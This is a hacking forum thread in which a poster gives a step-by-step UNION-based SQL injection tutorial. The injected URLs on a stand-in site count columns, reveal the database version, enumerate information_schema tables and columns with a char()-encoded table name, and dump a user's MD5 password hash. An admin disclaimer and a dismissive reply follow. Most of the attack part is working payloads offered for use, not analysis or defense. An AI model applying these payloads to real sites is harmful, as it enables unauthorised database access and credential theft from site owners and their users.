iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
SQL Union Based Inj3ction
  • DazHolmes
    Posts: 2
            
    ________                  ___ ___        .__                         
    \______ \ _____  ________/   |   \  ____ |  |   _____   ____   ______
     |    |  \\__  \ \___   /    ~    \/  _ \|  |  /     \_/ __ \ /  ___/
     |    `   \/ __ \_/    /\    Y    (  <_> )  |_|  Y Y  \  ___/ \___ \ 
    /_______  (____  /_____ \\___|_  / \____/|____/__|_|  /\___  >____  >
            \/     \/      \/      \/                   \/     \/     \/
        
    ##By Daz Holmes Inj3ct0rs
    ## www.example.com/post.php?id=276 Order by 10-- :No Error At it's highest table.
    ## www.example.com/post.php?id=276 union all select 1,2,3,4,5,6,7,8,9,10--    :Their will Appear some numbers                     

    ##The Number you Need will be Black and bold Witch is in my case is 6
    ##www.example.com/post.php?id=276 union all select 1,2,3,4,5,version(),7,8,9,10-- :So Now You take, the Number 6 and replace with Version() This will give you the version of the sql database 5.1.61-0+squeeze1
    ## www.example.com/post.php?id=276 union all select 1,2,3,4,5,table_name,7,8,9,10 from information_schema.tables  :Now Remove the Version and add table_name And take the -- of the end and add from information_schema.tables Now you see the tables I see ck_users Now you will need to code this into ascii So here is the, link http://easycalculation.com/ascii-hex.php
    When u type in their u will want the Equivalent Decimal / Ascii Value And u need to remove the spaces like so 99,107,95,117,115,101,114,115
    Now Add this to you're following link  from information_schema.columns where table_name=char(99,107,95,117,115,101,114,115 )-- With you're own code And change Table_names to column_name 

    ADMIN NOTICE: We do not condone unlawful attacks against any network, private, or public. -m0rph

    You should look like this
    http://www.example.com/post.php?id=276 union all select 1,2,3,4,5,column_name,7,8,9,10 from information_schema.columns where table_name=char(99,107,95,117,115,101,114,115 )--

    ##Now i See password. Now remove Column_name And add password and Remove all the rest you should look like this 
    http://www.example.com/post.php?id=276 union all select 1,2,3,4,5,password,7,8,9,10 from ck_users--
    #So now i see the md5 hash password 7bf5d02375375bb1066f2ebb8b9e0fff Hope, this helped. End results look like this.
  • x3n0n
    Posts: 110
    Lame... you don't explain things, you made this 'whatever' for skids who are to lazy to get the meaning behind all this... Learn some SQL and come back when you get what's behind all of the code :) Damn... I come back here after a while and this is the first I see... Makes me sad man...
  • DazHolmes
    Posts: 2
    Lol Sorry. it's my fault your dumb and don't understand this!
Add a Comment